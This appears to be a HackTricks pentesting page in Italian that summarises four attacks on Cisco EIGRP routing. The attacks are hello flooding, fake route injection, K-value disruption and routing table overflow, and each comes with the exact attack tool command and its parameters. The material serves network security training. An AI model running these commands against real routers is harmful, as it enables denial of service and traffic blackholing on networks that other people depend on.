EIGRP Attacks
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Questo è un riepilogo degli attacchi esposti in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Controllalo per ulteriori informazioni.
Obiettivo: Sovraccaricare le CPU dei router inondandole con pacchetti hello EIGRP, portando potenzialmente a un attacco Denial of Service (DoS).
Strumento: helloflooding.py script.
Esecuzione: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parametri:
--interface
: Specifica l'interfaccia di rete, ad esempio, eth0
.
--as
: Definisce il numero del sistema autonomo EIGRP, ad esempio, 1
.
--subnet
: Imposta la posizione della subnet, ad esempio, 10.10.100.0/24
.
Obiettivo: Interrompere il flusso di traffico di rete iniettando una rotta falsa, portando a un blackhole dove il traffico è diretto a una destinazione inesistente.
Strumento: routeinject.py script.
Esecuzione: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parametri:
--interface
: Specifica l'interfaccia del sistema dell'attaccante.
--as
: Definisce il numero AS EIGRP.
--src
: Imposta l'indirizzo IP dell'attaccante.
--dst
: Imposta l'indirizzo IP della subnet target.
--prefix
: Definisce la maschera dell'indirizzo IP della subnet target.
Obiettivo: Creare interruzioni e riconnessioni continue all'interno del dominio EIGRP iniettando valori K alterati, risultando effettivamente in un attacco DoS.
Strumento: relationshipnightmare.py script.
Esecuzione: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parametri:
--interface
: Specifica l'interfaccia di rete.
--as
: Definisce il numero AS EIGRP.
--src
: Imposta l'indirizzo IP di un router legittimo.
Obiettivo: Stressare la CPU e la RAM del router inondando la tabella di routing con numerose rotte false.
Strumento: routingtableoverflow.py script.
Esecuzione: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parametri:
--interface
: Specifica l'interfaccia di rete.
--as
: Definisce il numero AS EIGRP.
--src
: Imposta l'indirizzo IP dell'attaccante.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)